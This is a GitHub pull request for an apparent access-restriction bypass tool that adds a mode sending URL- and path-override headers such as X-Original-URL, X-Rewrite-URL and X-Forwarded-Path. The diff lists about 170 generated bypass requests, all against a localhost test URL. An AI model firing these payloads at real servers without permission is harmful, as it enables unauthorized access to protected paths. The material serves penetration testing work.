-
Notifications
You must be signed in to change notification settings - Fork 107
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Jtof fap header url #14
Conversation
Diff of diff --git a/tests-history/bup-payloads-2022-10-06.lst b/tests-history/bup-payloads-2022-11-21.lst
index 000cb1a..af485f4 100644
--- a/tests-history/bup-payloads-2022-10-06.lst
+++ b/tests-history/bup-payloads-2022-11-21.lst
@@ -1,5 +1,5 @@
-Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
+Bypasser has generated 3213 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[case_substitution] http://127.0.0.1:8000/Foo/bar
[case_substitution] http://127.0.0.1:8000/fOo/bar
[case_substitution] http://127.0.0.1:8000/foO/bar
@@ -2048,6 +2048,175 @@ Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[http_headers_scheme] -H X-Url-Scheme: http http://127.0.0.1:8000/foo/bar
[http_headers_scheme] -H X-Url-Scheme: https http://127.0.0.1:8000/foo/bar
[http_headers_scheme] -H X-Url-Scheme: webdav http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Accel-Redirect: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Envoy-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-Path-Override: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
[http_methods] -X ACL http://127.0.0.1:8000/foo/bar
[http_methods] -X BIND http://127.0.0.1:8000/foo/bar
[http_methods] -X CHECKIN http://127.0.0.1:8000/foo/bar |
Awesome addon man! |
On the performance part no significant change but since the last commit when I can use a set instead of list in a loop I don't hesitate anymore :-) I had coded this just after the last PR. The new mode is invoked by default: |
Hey hey !
Another PR, it's been a long time !
Small tweaks for code cleaning and performance:
*
operator to make a list of tupleAdded support for a new bypass mode -m
http_headers_url
:26 new headers supposed to take an Url as argument (
*URL
,*URI
,*Path
,Referer
, etc.) and approximately 170 additional bypass requests.Fuzzing approach for this new mode. For example for
X-Original-URL
onhttp://127.0.0.1:8000/foo/bar
url:Classic variant: Targets the base_url and moves original path to the headers:
Second variant: Targets the base_url and moves target_url to the headers (only for some headers susceptible to take a complete url as argument and not just a path) :
Third variant: Keeps the original target_url and go up the parent paths in headers:
Fourth variant: Same as third but with complete url (only for some headers):